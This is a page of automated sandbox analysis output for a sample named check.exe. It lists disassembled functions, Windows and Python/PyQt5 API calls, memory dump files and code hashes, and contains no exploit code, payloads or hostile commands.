Part of subcall function 00007FF6D9239390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6D92345F4,00000000,00007FF6D9231985), ref: 00007FF6D92393C9

LoadLibraryExW.KERNEL32(?,00007FF6D9236476,?,00007FF6D923336E), ref: 00007FF6D9238EA2

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: ByteCharLibraryLoadMultiWide
String ID:
API String ID: 2592636585-0
Opcode ID: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
Instruction ID: 334ae0e40f69b5bdf3c443fcab8f9caf59eb9f7dbd6272b52c138a04d5b01c8e
Opcode Fuzzy Hash: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
Instruction Fuzzy Hash: 6FD0C205F3524542FA84AB77BB4667E5251AF8DBC0F88C036EE4D83B4ADC3CC0614B00

Function 00007FF6D924D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF6D9240C90,?,?,?,00007FF6D92422FA,?,?,?,?,?,00007FF6D9243AE9), ref: 00007FF6D924D63A

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction ID: c63de3cf6caa5425c5a37aa3f07e52fc2efbad24fbaf256dc8c56358c98ea91f
Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction Fuzzy Hash: E0F08C10F3820380FE642F716B0137C12904FACBA0F080732DD2ECAAC6DE2CB4A08A10

Non-executed Functions

Function 00007FF6D9232A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6D923351A,?,00000000,00007FF6D9233F23), ref: 00007FF6D9232AA0

Strings

WARNING, xrefs: 00007FF6D9232AAF
Warning [ANSI Fallback], xrefs: 00007FF6D9232B0F
Warning, xrefs: 00007FF6D9232B1E
[PYI-%d:%s] , xrefs: 00007FF6D9232AA8
0, xrefs: 00007FF6D9232B16

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction ID: ebdadc2a4ad1f5b20c0eab10e96bc76c9315f5c28461567071501da916fb4e9e
Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction Fuzzy Hash: 21218132A29B8192F760DF61B9817EA63A4FB88784F400137EE8D93659DF3CD2558740

Function 00007FF6D9249A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6D9249AAD
GetProcAddress.KERNEL32 ref: 00007FF6D9249AC3
FreeLibrary.KERNEL32 ref: 00007FF6D9249AEA

Strings

mscoree.dll, xrefs: 00007FF6D9249AA4
CorExitProcess, xrefs: 00007FF6D9249ABC

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction ID: c516cbf26555efffdc05eb61694c7f7fd44b7f12a29fb35f5bf398e427f260c8
Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction Fuzzy Hash: 05F04F25A2960681FE548F24A95477E6320AF49BA1F540237D66EC65E8DF2CD498C740

Function 00007FF6D923F288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6D923F2B0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF6D923F398

Strings

csm, xrefs: 00007FF6D923F2D2
csm, xrefs: 00007FF6D923F3EA

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction ID: 938a166f14d5b3faecff409ff6ab078ed3e708552987b8923e4aa84a9d60322c
Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction Fuzzy Hash: 08516032B2838286FB648E32A2842AD77A0FB55B94F14413BDB5D87B95CF3CE464C701

Function 00007FFD8A28C9AC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFD8A28C9D8
GetCurrentThreadId.KERNEL32 ref: 00007FFD8A28C9E6
GetCurrentProcessId.KERNEL32 ref: 00007FFD8A28C9F2
QueryPerformanceCounter.KERNEL32 ref: 00007FFD8A28CA02

Memory Dump Source

Source File: 00000005.00000002.2601919902.00007FFD89FC1000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FFD89FC0000, based on PE: true

Associated: 00000005.00000002.2601836491.00007FFD89FC0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 00000005.00000002.2602999294.00007FFD8A28E000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 00000005.00000002.2603297291.00007FFD8A3DB000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 00000005.00000002.2603370477.00007FFD8A3EB000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000005.00000002.2603429805.00007FFD8A3F1000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 00000005.00000002.2603478721.00007FFD8A3F6000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000005.00000002.2603533100.00007FFD8A405000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 00000005.00000002.2603587490.00007FFD8A40C000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000005.00000002.2603644937.00007FFD8A40D000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 00000005.00000002.2603682855.00007FFD8A40E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000005.00000002.2603753610.00007FFD8A40F000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 00000005.00000002.2603822394.00007FFD8A428000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000005.00000002.2603877051.00007FFD8A437000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 00000005.00000002.2603963426.00007FFD8A447000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000005.00000002.2604019817.00007FFD8A448000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 00000005.00000002.2604069295.00007FFD8A449000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000005.00000002.2604529543.00007FFD8A44A000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 00000005.00000002.2604888252.00007FFD8A44D000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000005.00000002.2605209907.00007FFD8A44F000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd89fc0000_check.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 19a014122a8329d598b8a719417dcd6d526a9fad5fd2adc0fdb65de44e15e28a
Instruction ID: de5ca51d2b7264207e0e8820265fdadf75715e1b45b75cf4af4261e7e621f0d2
Opcode Fuzzy Hash: 19a014122a8329d598b8a719417dcd6d526a9fad5fd2adc0fdb65de44e15e28a
Instruction Fuzzy Hash: 81115E22B16F029AEB10CF65E8652B833A4FB19758F041E31EA2D57BA4EF3CD158D340

Analysis Process: check.exePID: 6704, Parent PID: 5716COMMON

Execution Graph

Execution Coverage:	0.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	52
Total number of Limit Nodes:	3

Executed Functions

Function 00007FFD87644760 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PyImport_ImportModuleLevelObject.PYTHON313 ref: 00007FFD87644791
PyObject_GetAttr.PYTHON313 ref: 00007FFD876447DD
PyUnicode_FromFormat.PYTHON313 ref: 00007FFD876447FD
PyObject_GetItem.PYTHON313 ref: 00007FFD87644815
_Py_Dealloc.PYTHON313 ref: 00007FFD8764482C
PyDict_SetItem.PYTHON313 ref: 00007FFD8764484D
PyObject_SetItem.PYTHON313 ref: 00007FFD87644855
_Py_Dealloc.PYTHON313 ref: 00007FFD8764486B
PyErr_Clear.PYTHON313 ref: 00007FFD8764489B
PyModule_GetFilenameObject.PYTHON313 ref: 00007FFD876448A4
PyUnicode_FromFormat.PYTHON313 ref: 00007FFD876448C2
PyErr_SetImportError.PYTHON313 ref: 00007FFD876448D9
_Py_Dealloc.PYTHON313 ref: 00007FFD876448ED
_Py_Dealloc.PYTHON313 ref: 00007FFD87644901
_Py_Dealloc.PYTHON313 ref: 00007FFD87644915

Strings

%U.%U, xrefs: 00007FFD876447F3
cannot import name %R from %R (%S), xrefs: 00007FFD876448B2

Memory Dump Source

Source File: 0000000F.00000002.2691691663.00007FFD87641000.00000020.00000001.01000000.0000003F.sdmp, Offset: 00007FFD87640000, based on PE: true

Associated: 0000000F.00000002.2691626103.00007FFD87640000.00000002.00000001.01000000.0000003F.sdmpDownload File
Associated: 0000000F.00000002.2691758382.00007FFD87655000.00000002.00000001.01000000.0000003F.sdmpDownload File
Associated: 0000000F.00000002.2691799100.00007FFD8765B000.00000004.00000001.01000000.0000003F.sdmpDownload File
Associated: 0000000F.00000002.2691856077.00007FFD8765F000.00000002.00000001.01000000.0000003F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd87640000_check.jbxd

Similarity

API ID: Dealloc$ItemObject_$Err_FormatFromImportObjectUnicode_$AttrClearDict_ErrorFilenameImport_LevelModuleModule_
String ID: %U.%U$cannot import name %R from %R (%S)
API String ID: 3630264407-438398067
Opcode ID: aea79ed82b41080dcdede2459c0bc734a1ab5dbcbebbb0792b6c7292410103bd
Instruction ID: e3a8b71e0d9642995c18d48b9617c350c83eb6c4f84214a33d4c0508efe69300
Opcode Fuzzy Hash: aea79ed82b41080dcdede2459c0bc734a1ab5dbcbebbb0792b6c7292410103bd
Instruction Fuzzy Hash: 90514C32B88A8285EF948F22A86AB7D6BA2BF49B95F444030CE4D47B55DF3CE445D700

Function 00007FFD87649263 Relevance: 19.6, APIs: 13, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFD876442E0: PyUnicode_FromStringAndSize.PYTHON313 ref: 00007FFD876443E9
Part of subcall function 00007FFD876442E0: PyUnicode_InternInPlace.PYTHON313 ref: 00007FFD87644402

_Py_Dealloc.PYTHON313 ref: 00007FFD876492CB
_Py_Dealloc.PYTHON313 ref: 00007FFD87649300
_Py_Dealloc.PYTHON313 ref: 00007FFD87649318
_Py_Dealloc.PYTHON313 ref: 00007FFD8764933B
_Py_Dealloc.PYTHON313 ref: 00007FFD8764935E
_Py_Dealloc.PYTHON313 ref: 00007FFD87649381
_Py_Dealloc.PYTHON313 ref: 00007FFD876493A4
_Py_Dealloc.PYTHON313 ref: 00007FFD876493C7
_Py_Dealloc.PYTHON313 ref: 00007FFD876493EA
_Py_Dealloc.PYTHON313 ref: 00007FFD8764940D
_Py_Dealloc.PYTHON313 ref: 00007FFD87649430
_Py_Dealloc.PYTHON313 ref: 00007FFD87649453
_Py_Dealloc.PYTHON313 ref: 00007FFD87649476

Memory Dump Source

Source File: 0000000F.00000002.2691691663.00007FFD87641000.00000020.00000001.01000000.0000003F.sdmp, Offset: 00007FFD87640000, based on PE: true

Associated: 0000000F.00000002.2691626103.00007FFD87640000.00000002.00000001.01000000.0000003F.sdmpDownload File
Associated: 0000000F.00000002.2691758382.00007FFD87655000.00000002.00000001.01000000.0000003F.sdmpDownload File
Associated: 0000000F.00000002.2691799100.00007FFD8765B000.00000004.00000001.01000000.0000003F.sdmpDownload File
Associated: 0000000F.00000002.2691856077.00007FFD8765F000.00000002.00000001.01000000.0000003F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd87640000_check.jbxd

Similarity

API ID: Dealloc$Unicode_$FromInternPlaceSizeString
String ID:
API String ID: 2745024575-0
Opcode ID: e3abe80e124aa434e129e5a5323edaca9fc8b80d125148bed174b3bde365830c
Instruction ID: c2a1ae4f8a43faa1310eba4b4bda0faaae6c2c4f20e6e3fac250997d2c2d1fa2
Opcode Fuzzy Hash: e3abe80e124aa434e129e5a5323edaca9fc8b80d125148bed174b3bde365830c
Instruction Fuzzy Hash: F871C235FCAB02C5FFD68F64E96763833A4BFA1B54F184630C54D96AA1DE2EA441E310

Function 00007FFD87652BDD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_Py_Dealloc.PYTHON313 ref: 00007FFD87652BE9

Strings

<module>, xrefs: 00007FFD87653EFB

Memory Dump Source

Source File: 0000000F.00000002.2691691663.00007FFD87641000.00000020.00000001.01000000.0000003F.sdmp, Offset: 00007FFD87640000, based on PE: true

Associated: 0000000F.00000002.2691626103.00007FFD87640000.00000002.00000001.01000000.0000003F.sdmpDownload File
Associated: 0000000F.00000002.2691758382.00007FFD87655000.00000002.00000001.01000000.0000003F.sdmpDownload File
Associated: 0000000F.00000002.2691799100.00007FFD8765B000.00000004.00000001.01000000.0000003F.sdmpDownload File
Associated: 0000000F.00000002.2691856077.00007FFD8765F000.00000002.00000001.01000000.0000003F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd87640000_check.jbxd

Similarity

API ID: Dealloc
String ID: <module>
API String ID: 3617616757-217463007
Opcode ID: 38ba6ef64a3c4e3da176dcc799c31920718849fe8b93e96334157dff539b19ff
Instruction ID: 3316d04ef07065501465052b73264f5ae57ec52e258559b2da8ae49489c37b44
Opcode Fuzzy Hash: 38ba6ef64a3c4e3da176dcc799c31920718849fe8b93e96334157dff539b19ff
Instruction Fuzzy Hash: 53F034A5F89A0780FFD19F1AEC2317D22517F45BA9F040432D90C0A2A1EE2CA882E310

Non-executed Functions

Function 00007FFD86224E00 Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 251
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PyObject_GetIter.PYTHON3 ref: 00007FFD86224E27
PyErr_Clear.PYTHON3 ref: 00007FFD86224E35
_Py_Dealloc.PYTHON3 ref: 00007FFD86224E49
PyType_GetFlags.PYTHON3 ref: 00007FFD86224E53
PyErr_Clear.PYTHON3 ref: 00007FFD86224EBE
PyIter_Next.PYTHON3 ref: 00007FFD86224EC7
?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE ref: 00007FFD86224F4C
??0QBrush@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FFD86224F86
??0QBrush@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FFD86224FD6
??1QKeySequence@@QEAA@XZ.QT5GUI ref: 00007FFD86225027
?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFD86225035
??0QBrush@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FFD86225056
??0QBrush@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FFD86225080
?append@QListData@@QEAAPEAPEAXXZ.QT5CORE ref: 00007FFD86225089
_Py_Dealloc.PYTHON3 ref: 00007FFD862250BD
PyErr_Clear.PYTHON3 ref: 00007FFD862250CB
PyIter_Next.PYTHON3 ref: 00007FFD862250D4
PyErr_Occurred.PYTHON3 ref: 00007FFD862250EE
_Py_Dealloc.PYTHON3 ref: 00007FFD8622511B
PyErr_Format.PYTHON3 ref: 00007FFD8622516C
_Py_Dealloc.PYTHON3 ref: 00007FFD8622517C
_Py_Dealloc.PYTHON3 ref: 00007FFD862251A0
_Py_Dealloc.PYTHON3 ref: 00007FFD862251B4

Strings

index %zd has type '%s' but 'QKeySequence' is expected, xrefs: 00007FFD8622515C

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Dealloc$Err_$Brush@@V0@@$ClearData@@List$Iter_Next$?append@?detach_grow@?dispose@Data@1@Data@1@@FlagsFormatIterObject_OccurredSequence@@Type_
String ID: index %zd has type '%s' but 'QKeySequence' is expected
API String ID: 2976556432-3181054400
Opcode ID: 811e773dfdd0ecc03bf6bf7d81b9cda073635cf841f1c0c61e4578504a069361
Instruction ID: edacffe33ea458ce09833825c31821b86ef1bfa0a0739861883a22e68c55b5b5
Opcode Fuzzy Hash: 811e773dfdd0ecc03bf6bf7d81b9cda073635cf841f1c0c61e4578504a069361
Instruction Fuzzy Hash: FDB17E32B09A4282EA20DF15E8682BDB365FF85BA5F988131DE4E57764DF3CE845C700

Function 00007FFD8628EA70 Relevance: 40.6, APIs: 18, Strings: 5, Instructions: 300
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?drawRects@QPainter@@QEAAXPEBVQRectF@@H@Z.QT5GUI ref: 00007FFD8628EAF4
PyTuple_Size.PYTHON3 ref: 00007FFD8628EBB2
??0QLineF@@QEAA@XZ.QT5CORE ref: 00007FFD8628EBE5
PyTuple_Size.PYTHON3 ref: 00007FFD8628EC0D
PyTuple_GetItem.PYTHON3 ref: 00007FFD8628EC30
PyTuple_Size.PYTHON3 ref: 00007FFD8628EC92
PyTuple_Size.PYTHON3 ref: 00007FFD8628ECAA
?drawRects@QPainter@@QEAAXPEBVQRectF@@H@Z.QT5GUI ref: 00007FFD8628ECBB
?drawRects@QPainter@@QEAAXPEBVQRect@@H@Z.QT5GUI ref: 00007FFD8628ED3C
PyTuple_Size.PYTHON3 ref: 00007FFD8628EDC5
??0QRect@@QEAA@XZ.QT5CORE ref: 00007FFD8628EDF8
PyTuple_Size.PYTHON3 ref: 00007FFD8628EE16
PyTuple_GetItem.PYTHON3 ref: 00007FFD8628EE40
PyTuple_Size.PYTHON3 ref: 00007FFD8628EE97
PyTuple_Size.PYTHON3 ref: 00007FFD8628EEAB
?drawRects@QPainter@@QEAAXPEBVQRect@@H@Z.QT5GUI ref: 00007FFD8628EEBC
_Py_Dealloc.PYTHON3 ref: 00007FFD8628EF1B

Strings

QPainter, xrefs: 00007FFD8628EF51
drawRects(self, rects: Optional[PyQt5.sip.array[QRectF]])drawRects(self, rect: Optional[QRectF], *args: QRectF)drawRects(self, rects: Optional[PyQt5.sip.array[QRect]])drawRects(self, rect: Optional[QRect], *args: QRect), xrefs: 00007FFD8628EF3F
each argument must be an instance of %s, xrefs: 00007FFD8628EEF1
drawRects, xrefs: 00007FFD8628EF4A
BJ8W, xrefs: 00007FFD8628EB4A, 00007FFD8628ED72

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Tuple_$Size$?drawPainter@@Rects@$Rect@@$ItemRect$DeallocLine
String ID: BJ8W$QPainter$drawRects$drawRects(self, rects: Optional[PyQt5.sip.array[QRectF]])drawRects(self, rect: Optional[QRectF], *args: QRectF)drawRects(self, rects: Optional[PyQt5.sip.array[QRect]])drawRects(self, rect: Optional[QRect], *args: QRect)$each argument must be an instance of %s
API String ID: 1686041874-774810585
Opcode ID: 3e166f7ce50faa4ddb9091ee2ed0b9c828daf4ae1a7c307e800be977617faebf
Instruction ID: ec432db977857670de81eb826da8242734b4bd0547b7b671cec28651295525b8
Opcode Fuzzy Hash: 3e166f7ce50faa4ddb9091ee2ed0b9c828daf4ae1a7c307e800be977617faebf
Instruction Fuzzy Hash: 94E12E36B09B4689EB50DF26E8642AD77A4FB58BA4F544132EE4D47B64EF3CE944C300

Function 00007FFD862B0EE0 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PyObject_GetIter.PYTHON3 ref: 00007FFD862B0F02
PyErr_Clear.PYTHON3 ref: 00007FFD862B0F10
_Py_Dealloc.PYTHON3 ref: 00007FFD862B0F24
PyType_GetFlags.PYTHON3 ref: 00007FFD862B0F2E
PyErr_Clear.PYTHON3 ref: 00007FFD862B0F97
PyIter_Next.PYTHON3 ref: 00007FFD862B0FA0
?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE ref: 00007FFD862B1028
memcpy.VCRUNTIME140 ref: 00007FFD862B106C
memcpy.VCRUNTIME140 ref: 00007FFD862B10B6
?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFD862B10D5
_Py_Dealloc.PYTHON3 ref: 00007FFD862B110E
PyErr_Clear.PYTHON3 ref: 00007FFD862B1117
PyIter_Next.PYTHON3 ref: 00007FFD862B1120
PyErr_Occurred.PYTHON3 ref: 00007FFD862B1140
?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFD862B1168
_Py_Dealloc.PYTHON3 ref: 00007FFD862B1184
PyErr_Format.PYTHON3 ref: 00007FFD862B11D9
_Py_Dealloc.PYTHON3 ref: 00007FFD862B11E8
?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFD862B1207
_Py_Dealloc.PYTHON3 ref: 00007FFD862B1227
_Py_Dealloc.PYTHON3 ref: 00007FFD862B123B

Strings

index %zd has type '%s' but 'QOpenGLContext' is expected, xrefs: 00007FFD862B11C9

Memory Dump Source

